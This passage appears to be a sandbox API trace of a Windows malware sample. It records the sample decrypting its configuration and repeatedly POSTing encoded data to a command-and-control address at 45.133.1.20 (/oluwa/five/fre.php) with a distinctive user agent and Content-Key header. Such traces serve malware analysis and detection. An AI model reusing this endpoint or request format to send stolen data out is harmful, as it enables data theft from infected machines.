(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.630] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.633] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.634] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.634] GetProcessHeap () returned 0x6a0000 [0161.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.634] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.634] GetProcessHeap () returned 0x6a0000 [0161.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.635] GetProcessHeap () returned 0x6a0000 [0161.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.635] GetProcessHeap () returned 0x6a0000 [0161.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0161.635] GetProcessHeap () returned 0x6a0000 [0161.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0161.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.636] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.645] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0161.652] GetProcessHeap () returned 0x6a0000 [0161.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.654] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.655] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.662] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.663] GetProcessHeap () returned 0x6a0000 [0161.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.668] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0161.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.669] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.671] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0161.671] GetProcessHeap () returned 0x6a0000 [0161.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.672] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0161.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.673] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0161.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.677] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0161.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.679] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0161.679] GetProcessHeap () returned 0x6a0000 [0161.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.679] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9f00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0161.679] GetProcessHeap () returned 0x6a0000 [0161.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0161.679] socket (af=2, type=1, protocol=6) returned 0x2bc [0161.679] connect (s=0x2bc, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0161.706] FreeAddrInfoW (pAddrInfo=0x6b9f00*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0161.707] GetProcessHeap () returned 0x6a0000 [0161.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0161.707] GetProcessHeap () returned 0x6a0000 [0161.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0161.709] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.710] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0161.710] GetProcessHeap () returned 0x6a0000 [0161.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0161.710] GetProcessHeap () returned 0x6a0000 [0161.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.711] GetProcessHeap () returned 0x6a0000 [0161.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0161.711] GetProcessHeap () returned 0x6a0000 [0161.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0161.712] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.713] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0161.713] GetProcessHeap () returned 0x6a0000 [0161.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0161.713] GetProcessHeap () returned 0x6a0000 [0161.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.713] send (s=0x2bc, buf=0x6bbd20*, len=242, flags=0) returned 242 [0161.714] send (s=0x2bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0161.714] GetProcessHeap () returned 0x6a0000 [0161.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0161.714] recv (in: s=0x2bc, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0161.810] GetProcessHeap () returned 0x6a0000 [0161.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0161.812] GetProcessHeap () returned 0x6a0000 [0161.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0161.813] GetProcessHeap () returned 0x6a0000 [0161.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0161.813] GetProcessHeap () returned 0x6a0000 [0161.813] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0161.814] closesocket (s=0x2bc) returned 0 [0161.814] GetProcessHeap () returned 0x6a0000 [0161.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0161.814] GetProcessHeap () returned 0x6a0000 [0161.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.815] GetProcessHeap () returned 0x6a0000 [0161.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0161.815] GetProcessHeap () returned 0x6a0000 [0161.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.816] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1314) returned 0x2bc [0161.819] Sleep (dwMilliseconds=0xea60) [0161.837] GetProcessHeap () returned 0x6a0000 [0161.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0161.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.838] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0161.859] GetProcessHeap () returned 0x6a0000 [0161.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.860] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0161.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.861] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.862] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.862] GetProcessHeap () returned 0x6a0000 [0161.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.867] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0161.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.871] CryptDestroyKey (hKey=0x6ad060) returned 1 [0161.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.872] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0161.872] GetProcessHeap () returned 0x6a0000 [0161.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.873] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.874] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.876] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.877] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.877] GetProcessHeap () returned 0x6a0000 [0161.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.877] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.878] GetProcessHeap () returned 0x6a0000 [0161.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.878] GetProcessHeap () returned 0x6a0000 [0161.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.879] GetProcessHeap () returned 0x6a0000 [0161.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0161.879] GetProcessHeap () returned 0x6a0000 [0161.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0161.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.881] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.896] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0161.929] GetProcessHeap () returned 0x6a0000 [0161.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.931] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.938] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.940] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.940] GetProcessHeap () returned 0x6a0000 [0161.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.942] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0161.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.943] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.944] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0161.944] GetProcessHeap () returned 0x6a0000 [0161.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.949] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0161.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.950] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0161.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.952] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0161.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.954] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0161.954] GetProcessHeap () returned 0x6a0000 [0161.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0161.954] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0161.954] GetProcessHeap () returned 0x6a0000 [0161.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0161.954] socket (af=2, type=1, protocol=6) returned 0x2c0 [0161.955] connect (s=0x2c0, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0161.988] FreeAddrInfoW (pAddrInfo=0x6b9dc0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0161.988] GetProcessHeap () returned 0x6a0000 [0161.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0161.989] GetProcessHeap () returned 0x6a0000 [0161.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0161.990] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.993] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0161.993] GetProcessHeap () returned 0x6a0000 [0161.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0161.993] GetProcessHeap () returned 0x6a0000 [0161.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.994] GetProcessHeap () returned 0x6a0000 [0161.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0161.995] GetProcessHeap () returned 0x6a0000 [0161.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0161.996] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.997] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0161.998] GetProcessHeap () returned 0x6a0000 [0161.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0161.998] GetProcessHeap () returned 0x6a0000 [0161.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.998] send (s=0x2c0, buf=0x6bbd20*, len=242, flags=0) returned 242 [0161.999] send (s=0x2c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0162.000] GetProcessHeap () returned 0x6a0000 [0162.000] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0162.000] recv (in: s=0x2c0, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0162.070] GetProcessHeap () returned 0x6a0000 [0162.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0162.071] GetProcessHeap () returned 0x6a0000 [0162.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0162.072] GetProcessHeap () returned 0x6a0000 [0162.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0162.072] GetProcessHeap () returned 0x6a0000 [0162.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0162.072] closesocket (s=0x2c0) returned 0 [0162.073] GetProcessHeap () returned 0x6a0000 [0162.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0162.073] GetProcessHeap () returned 0x6a0000 [0162.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0162.074] GetProcessHeap () returned 0x6a0000 [0162.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0162.074] GetProcessHeap () returned 0x6a0000 [0162.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0162.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d4) returned 0x2c0 [0162.076] Sleep (dwMilliseconds=0xea60) [0162.077] GetProcessHeap () returned 0x6a0000 [0162.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0162.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.080] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.087] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0162.096] GetProcessHeap () returned 0x6a0000 [0162.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9968 [0162.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.097] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b9968, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0162.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.098] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.102] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.102] GetProcessHeap () returned 0x6a0000 [0162.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9968 | out: hHeap=0x6a0000) returned 1 [0162.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.104] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0162.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.105] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0162.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0162.106] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0162.106] GetProcessHeap () returned 0x6a0000 [0162.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0162.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.107] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.108] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.109] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.110] 